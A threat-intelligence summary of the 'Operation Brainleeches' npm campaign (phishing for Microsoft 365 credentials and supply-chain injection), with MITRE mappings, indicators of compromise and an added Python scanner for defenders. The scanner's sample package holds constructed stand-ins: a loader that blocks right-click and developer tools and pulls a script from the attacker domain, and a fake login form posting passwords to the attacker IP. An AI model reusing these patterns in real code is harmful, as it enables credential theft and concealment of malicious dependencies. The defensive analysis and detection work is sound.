ReversingLabs’ researchers uncovered more than a dozen malicious npm packages used to power a dual-use campaign that blends phishing against Microsoft 365 users with software supply chain manipulation. Dubbed Operation Brainleeches, the campaign features two distinct package groups and multiple techniques (including obfuscation) to harvest credentials and push malicious code into apps, highlighting the evolving risk of open source dependencies being used for broad attacks. #OperationBrainleeches #IconBurst
Keypoints
- Operation Brainleeches is a two-phase, dual-use campaign leveraging malicious npm packages for both phishing and supply chain manipulation.
- Phase 1 targets end users via phishing attachments that present fake Microsoft login forms and exfiltrate credentials.
- Phase 2 targets developers by injecting malicious code into npm packages that could be bundled into legitimate applications.
- Packages mimic legitimate modules (e.g., jquery) and include obfuscated JavaScript to conceal malicious functionality.
- Two tranches were published between May and June, with around 1,000 downloads before npm removed the packages.
- Evidence suggests turnkey phishing kits and low-skill actors drove the operations, using publicly hosted code and credential harvesting pages.
MITRE Techniques
- [T1195] Supply Chain Compromise – long-term campaigns infiltrate development pipelines and slip malicious code or dependencies into legitimate application updates. “long-term plays in which skilled cyber actors quietly infiltrate development pipelines and slip malicious code or dependencies into legitimate application updates.”
- [T1566.001] Phishing: Spearphishing Attachment – malicious email attachments paired with phishing emails delivering fake Microsoft login flows. “malicious email attachments containing the jquery.js paired with phishing emails.”
- [T1555.003] Credentials in Web Forms – phishing pages capture credentials via a fake Microsoft login form and send them to a remote server. “The DEMO.txt file contains HTML code that mimics the login for Microsoft.com. It also includes the URL of a remote server, hxxp://ourwhite.brainleeches.xyz, to which harvested credentials from the form are sent.”
- [T1027] Obfuscated/Compressed Files and Information – many of the malicious packages contained obfuscated files. “many of these packages contained files that were obfuscated.”
- [T1059.007] Command and Scripting Interpreter: JavaScript – JS within the packages orchestrates the payload (e.g., jquery.js fetching jquery.min.js and writing to a dynamic document). “jquery.js … writing the content of that file to a dynamically created ‘document’.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – attackers disabled right-click and developer tools to hinder discovery. “disable right mouse button functions on the web page and disabling the ability of users to open developer tools with a hot-key.”
- [T1041] Exfiltration Over C2 Channel – credentials exfiltrated to a remote server. “passwords entered into this form were sent to a different location, a server located at the address 137.184.153.238.”
Indicators of Compromise
- [Domain] ourwhite.brainleeches.xyz – used as a command-and-control/resource host for credential harvesting
- [IP Address] 137.184.153.238 – remote server receiving harvested credentials
- [SHA1] 93027a2aa009502ce1992c851d4551573cb90b94 – standforusz 1.0.2
- [SHA1] 121b10560f54d7767d250e15deb4aff89b577d03 – standforusz 1.0.3
- [File name] DEMO.txt – included in the standforusz package; contains the HTML of the fake Microsoft login page
- [File name] index.js – main script inside jqueryoffline package used in the Webpack flow
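The techniques and indicators listed above translate directly into a package-level check a defender can run before a dependency is bundled. The script below is an added example, not ReversingLabs' code or tooling from the report: it walks an unpacked npm package, matches file SHA1s, the domain and the IP against the indicators published above, and additionally flags JavaScript that shows the behaviours the report describes (right-click suppression, F12 blocking, loading a second script into a dynamically opened document). The regular expressions are my assumptions about how those behaviours typically appear in source, and the sample package it scans is constructed inline with inert text standing in for the real files.

```python
"""Scan an unpacked npm package for the Brainleeches indicators and behaviours."""
import hashlib
import re
import tempfile
from pathlib import Path

# Network and file-hash indicators copied from the report above.
IOC_DOMAINS = {"ourwhite.brainleeches.xyz"}
IOC_IPS = {"137.184.153.238"}
IOC_SHA1 = {
    "93027a2aa009502ce1992c851d4551573cb90b94": "standforusz 1.0.2",
    "121b10560f54d7767d250e15deb4aff89b577d03": "standforusz 1.0.3",
}

# Behavioural heuristics are assumptions about how the described tricks usually
# look in source (right-click suppression, F12 blocking, remote script load,
# writing into a dynamically opened document); tune them for your code base.
HEURISTICS = {
    "contextmenu_suppressed": re.compile(
        r"oncontextmenu\s*=|addEventListener\s*\(\s*['\"]contextmenu['\"]", re.I),
    "devtools_hotkey_blocked": re.compile(
        r"keyCode\s*===?\s*123|key\s*===?\s*['\"]F12['\"]", re.I),
    "remote_script_load": re.compile(r"https?://[^\s'\"<>]+\.js\b", re.I),
    "dynamic_document_write": re.compile(
        r"document\.write\s*\(|document\.open\s*\(", re.I),
}

SCAN_SUFFIXES = {".js", ".txt", ".html", ".htm", ".json"}


def sha1_of(path):
    """Stream a file through SHA1 so large bundles do not need to fit in memory."""
    h = hashlib.sha1()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_file(path):
    """Return a finding dict for one file, or None if nothing stands out."""
    digest = sha1_of(path)
    ioc_hits = []
    if digest in IOC_SHA1:
        ioc_hits.append(f"sha1 matches {IOC_SHA1[digest]}")
    heuristics = []
    if path.suffix.lower() in SCAN_SUFFIXES:
        text = path.read_text(encoding="utf-8", errors="replace")
        ioc_hits += [f"domain {d}" for d in IOC_DOMAINS if d in text]
        ioc_hits += [f"ip {ip}" for ip in IOC_IPS if ip in text]
        heuristics = [name for name, rx in HEURISTICS.items() if rx.search(text)]
    # A single heuristic fires on plenty of legitimate front-end code; require
    # either a hard indicator or at least two behaviours appearing together.
    suspicious = bool(ioc_hits) or len(heuristics) >= 2
    if not (ioc_hits or heuristics):
        return None
    return {"file": path.name, "sha1": digest, "ioc_hits": ioc_hits,
            "heuristics": heuristics, "suspicious": suspicious}


def scan_package(root):
    """Walk an unpacked package directory and collect findings in path order."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        result = scan_file(path)
        if result:
            findings.append(result)
    return findings


def build_sample_package():
    """Write a constructed package mirroring the described layout (inert stand-ins, not the real files)."""
    root = Path(tempfile.mkdtemp(prefix="brainleeches-sample-"))
    (root / "package.json").write_text('{"name": "example-lookalike", "version": "0.0.1"}\n')
    (root / "jquery.js").write_text(
        "// constructed loader stub\n"
        "document.oncontextmenu = function () { return false; };\n"
        "document.onkeydown = function (e) { if (e.keyCode === 123) return false; };\n"
        "var d = document.open();\n"
        "d.write('<script src=\"http://ourwhite.brainleeches.xyz/jquery.min.js\"></script>');\n")
    (root / "DEMO.txt").write_text(
        "<!-- constructed stand-in for a fake login form -->\n"
        "<form action=\"http://137.184.153.238/\" method=\"post\">"
        "<input name=\"password\" type=\"password\"></form>\n")
    (root / "README.md").write_text("Harmless readme with no indicators.\n")
    return root


if __name__ == "__main__":
    for finding in scan_package(build_sample_package()):
        flag = "SUSPICIOUS" if finding["suspicious"] else "review"
        print(f"{flag:10} {finding['file']}: {finding['ioc_hits'] or finding['heuristics']}")
```

Point `scan_package` at the directory `npm pack` or `tar xzf` produced for a dependency under review; the hash and network matches are hard evidence, while the behavioural heuristics are only a triage signal and are deliberately not enough on their own unless two of them co-occur in the same file.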